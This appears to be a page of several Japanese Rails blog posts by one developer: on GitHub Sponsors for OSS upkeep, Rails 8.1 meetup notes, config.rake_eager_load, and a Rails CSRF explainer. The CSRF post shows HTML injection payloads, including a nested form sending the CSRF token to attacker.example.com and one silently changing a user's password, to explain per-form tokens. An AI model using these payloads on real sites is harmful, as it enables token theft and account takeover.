始めてみました。

github.com

ここ最近はseed-fuをforkしたり、gonのメンテナになったり、Sorceryのメンテナになったりと、メンテが滞っているライブラリの手助けをすることが増えてきました。あとCIが整っていないライブラリを見つけたら直すというのをちょくちょくやっています。

今日のCI改善 https://t.co/b2MvkxUGCK

— willnet (@netwillnet) December 11, 2025

メンテされないgemとどう向き合うか。“普通のOSS開発者” willnetさんの取り組み - Findy Media | IT/Webエンジニアの転職・求人サイトFindy – GitHubからスキル偏差値を算出 にもCI改善の話を書きました。

僕はこれらのgemを直接自分では使っていない事が多いです。お手伝い先が使っていることがモチベーションになっていますが、将来的にお手伝い先がそのgemを使わなくなったらどうでしょう？僕は自分のメンテナンスしているライブラリが最新のRubyやRailsで動かなくなるのは絶対嫌なのでメンテナンスが止まることはない*1と思いますが、モチベーションは少し下がりそうです。

でも僕のメンテナンスしているライブラリを直接使っている他の人や会社が応援してくれたらもっとやる気が出そうだな、と思ったのでGitHub Sponsorsを始めてみました。

OSSの継続可能性について考えている

GitHub Sponsorsを始めたのにはもう一つ理由があって、それは「GitHub Sponsorsが備えている機能を使ってみたかった」です。

メンテが滞っているライブラリの手助けをするなかで、もっとOSSエコシステムをいい感じにできんもんかな、というのを時折考えます。例えば人気のOSSライブラリをメンテナンスしているひとにお金がちょっとでも入ってきたらメンテナンスが滞ることも減るんじゃないかなと思うのですが、現状そうなってはいません。

GitHub Sponsorsは我々開発者にとって一番身近な寄付の手段であるので、スポンサーを受ける側としてどういう機能があって、どのような手法で寄付を募ることができるのかを実際に使ってみることで知りたかったのでした。

実際に始めてみると、寄付してくれた人限定でprivateリポジトリの招待ができたり、ニュースレターを遅れたりする機能があるのを見つけました。なので

• 毎月10ドル以上のスポンサーに活動報告を送ります
• 毎月100ドル以上のスポンサーに公開前のOSSライブラリを閲覧できる権利を付与します

みたいなことはできそうです。実際やるかはさておき、いろんな手段があるのは良いですね。

まとめ

もし@willnetを応援してもいいぞ、という人や企業がいたらスポンサーのほどよろしくお願いします！

github.com

Rails8.2ではCSRFトークンを使わずにCSRFを防げるようになりそう - おもしろwebサービス開発日記の続きです。前回のエントリではRails8.2からトークンを使わずにCSRFを防ぐ仕組みが入るぞ、という話をしました。偽陽性がかなり減ることが予想されるため、個人的には大歓迎です。

ただ、トークンを利用することで防げる攻撃もあるので100%上位互換というわけではないぞ、という話をこれからします。

前提: Railsはフォームごとに別々のトークンを発行する

Railsはこれまでトークンを利用してCSRF攻撃を検知していました。Rails5.0からはデフォルトでフォームごと*1に別々のトークンを利用されるようになっています。これはconfig.action_controller.per_form_csrf_tokens = trueとするかconfig.load_defaults 5.0以上で有効になっています。

PRはこちら。 Per-form CSRF tokens by btoews · Pull Request #22275 · rails/rails

なぜわざわざフォームごとに別々のトークンが必要なのでしょうか？CSRF攻撃を検知する目的であれば単一のトークンで良いように思えますよね。説明は上記PRに書いているのですが、読むのは大変だと思うので以下に要約しておきます。

フォームごとに別々のトークンを発行することで防ぐことのできる攻撃

まずRailsアプリケーションにXSSの脆弱性が存在することと、CSPが適切に設定されていてXSSからのJavaScriptを実行できなくなっていることが前提となります。JavaScriptが実行できなければXSSの脆弱性があっても安心…というわけではありません。次のような形で攻撃ができてしまいます。<!-- xss -->と書かれた行が攻撃者が追加した文字列です。

<form method="post" action="//attacker.example.com/tokens"><!-- xss -->
<form method="post" action="/innocuous">
 <input type="hidden" name="authenticity_token" value="thetoken">
 <input type="submit" value="なにかを登録する">
</form>

このように正規のformタグの外側にformタグをネストさせることで、(HTMLとしては不正ですが)攻撃者が用意したURLにformの内容を送信させ、フォームの入力内容やトークンを盗むことができてしまいます。この攻撃自体はCSPのform-action を利用することで防ぐことができます。しかし次のような同一オリジンに対する送信は防ぐことができません。ユーザが送信ボタンを押すと、攻撃者が設定したパスワードに意図せず変更されてしまいます。

<form method="post" action="/user/change_password"><!-- xss -->
<input type="hidden" name="password" value="password"><!-- xss -->
<form method="post" action="/innocuous">
 <input type="hidden" name="authenticity_token" value="thetoken">
 <input type="submit" value="なにかを登録する">
</form>

フォームごとに異なるトークンを付与することで、この攻撃をActionController::InvalidAuthenticityTokenエラーにするなどして無効にできます。

感想

トークンを使うことで防ぐことのできる攻撃を紹介しました。前提条件がかなり難しいので僕を含む一般的な開発者はそこまで気にしなくていいとは思います(それよりもXSSできないように注意するほうが重要でしょう)。が、こういう攻撃手法もあるんですよという話は知っておいて損はないかと思ったので紹介してみました。

Ginza.rb 第94回 - Rails8.1について学ぶぞ - connpass

第94回は10月22日にリリースされたRails8.1について学んでいきました。

メジャーフィーチャーについてy-yagiさんのまとめた資料を参考にしつつ学び、マイナーフィーチャーと関連した話題について僕のつくったgistを参考にしつつ話をしていきました。

• About Rails 8.1 - Slidev
• Rails8.1のマイナーフィーチャーで気になったもの

個人的な感想

特に気になったものについて書いています。

Active Job Continuations

Active Job Continuationsは、大きいジョブを運用しているときにめっちゃ便利なケースがあるけど、たとえばOOMKillerにワーカプロセスが殺されたときはうまくContinueしないぞ、などきちんと機能の詳細を把握して使わないと困るケースが有り玄人向けの機能だな〜という感想を持っています。あとこれは当然なんだけどSidekiqを直接使っている会社だと使えないのが残念。

Local CI

これがRailsに入ったタイミングでは、仕事のRailsアプリケーションはさすがにローカルで実行するには実行時間が長すぎて使えないので個人開発向けだろう、と思っていました。が、最近は少し考え方が変わって仕事のRailsアプリケーションでも一部ローカルで実行できるんじゃないかなあと思っています。(アプリケーションの規模によるけど)lintやモデルのテストだけでもローカルで実行する、ができるとgit pushして30分待ってtypoに気づき、修正してgit pushしてまた30分待つ…みたいなのが減らせて開発のリズムが良くなるんじゃないかなと。gh-signoff のPartial signoffを利用したらローカルで通したテストについてはクラウドでスキップする、が工夫したらできるんじゃないかな(まだ試せてない)。そうするとCI料金も減らせてなお良さそう。

Structured Event Reporting

待望の機能ではあるけどRails8.1時点だとまだ利用するのに工夫が必要なので、差し迫って構造化ログが必要な状況なひといあれば8.2を待ったほうがいいんじゃないかなと個人的には思っています。

Deprecated Associations

歴史のあるアプリケーションを整理するのにべんりでは。

開発時のエラーページの改善

これらの話

• エラーページからエディタを直接開けるようになった
• エラーページのテキストをコピーするボタンが付いた

特に後者のテキストをコピーするボタンはAI Agent開発時代に即した便利機能で最高だなと思っています。

次回

次回は1月16日(金)開催で、Ruby4.0について学んでいく予定です。興味がある人ぜひご参加ください(\( ⁰⊖⁰)/)

Ginza.rb 第95回 - Ruby4.0について学ぶぞ - connpass

これはRuby/Rails Advent Calendar 2025 の 5日目の記事です。

Ruby/Rails - Qiita Advent Calendar 2025 - Qiita

次のPRで、Rails8.2でrails newしたときに生成されるconfig/environments/test.rbにconfig.rake_eager_load = ENV["CI"].present?が追加されました

Fix CI eager loading when rake tasks invoke :environment before tests by trevorturk · Pull Request #56212 · rails/rails

これはなんでしょうか。というのが今日の本題です。これを説明するには前提となるところから話していかないといけません。

config.eager_loadとは

Railsにはconfig.eager_loadという設定があります。これはRailsを起動したときにすべてのアプリケーションコードを読み込むかどうかの設定です。だいたいのRailsアプリケーションにおいて開発環境ではfalse、本番環境ではtrueになっているはずです。

テスト環境においては、Rails7.0より前はデフォルトfalseでしたが、Rails7.0からENV["CI"]の有無を見てCI実行時にはeager_loadするという設定になりました*1。

Enable eager loading by default on CI systems by byroot · Pull Request #43508 · rails/rails

CIでアプリケーション全体のテストを実行するときはeager loadしたほうがテストが安定するというのが主な理由です。

config.rake_eager_loadとは

一方で、rakeタスク実行時はeager_loadを無効にするという仕様がありました(Rails4.1から)。

導入されたPR: #11381: Ignore config.eager_load=true for rake by pftg · Pull Request #11389 · rails/rails 元となったIssue: Precompile tries to access the database on acceptance validation · Issue #11381 · rails/rails

元となったIssueは、「自分のアプリケーションだとrake assets:precompileでDBアクセスが発生してrakeタスクが失敗するのでそれを避けたい」というものでした。これの解決策として「rakeタスク実行時はeager loadを無効にする」が入りました。

しかしrakeタスクでeager_loadを強制的に無効にするのではなくて設定可能にしたいという人が現れconfig.rake_eager_loadが生まれました(Rails6.1から)。

[Railties] Add config rake_eager_load by tjoyal · Pull Request #28209 · rails/rails

互換性を考えてデフォルトはfalseになっています。

rakeタスクのときは常にconfig.rake_eager_loadを見る

先程Rails7.0以降はENV["CI"]の有無を見てCI実行時にはeager_load設定になったと書きましたが、これはrakeタスクには適用されていませんでした。理由はconfig.rake_eager_loadを参照する次のコードです。

rails/railties/lib/rails/application.rb at 4c53863e354ad94dbfaf0643d9cdc99393a1a583 · rails/rails

Railsアプリケーションで利用するrakeタスク内でよく使われる:environmentタスクを実行するとconfig.rake_eager_loadの値でconfig.eager_loadが上書きされてしまいます。これによりeager loadしているはずのbin/rails testがeager loadしていませんでした。

RSpecだとどうだろう？と思ったのでbin/rake経由でのRSpecを実行したのですがconfig.eager_load #=> trueだったので、恐らくRSpecユーザは(少なくともテストの実行に関しては)影響はないはず。

しかしRails標準のテスト実行時にconfig.eager_load = trueしたはずなのにeager loadされていないというのは混乱を招くので、今回その対策としてconfig.rake_eager_load = ENV["CI"].present?もconfig/environments/test.rbに追加されたというわけです。

テストに限らず本番環境でもconfig.rake_eager_loadは気をつけないといけない

ここまでCIの話をしましたが、本番環境でも同じことがおきます。config.eager_load = trueになっていてもconfig.rake_eager_load = trueにしないとrakeタスク実行時にeager loadしません。これを知らずにeager loadしている前提のrakeタスクを実行すると不具合に繋がります。

Rails Guidesにも2年ほど前に注意書きが追加されています。

Document config.rake_eager_load in the autoloading guide · rails/rails@6cbd2c9

今回導入されたPRはRails8.2でrails newしたときに反映されますが、各設定値は昔からあるものなので先んじてconfig/environments/test.rbやconfig/environments/production.rbに反映しておくと幸せになれる人がいるのではないでしょうか。

こういう話をもっと聞きたいひと

今回のエントリはお手伝い先で最近のRails情報を共有する一環で調査したものです。もっとこういう話を聞きたいぞ、というひとは 株式会社ウィルネットとして提供する技術顧問サービスについて を参照のうえお問い合わせください。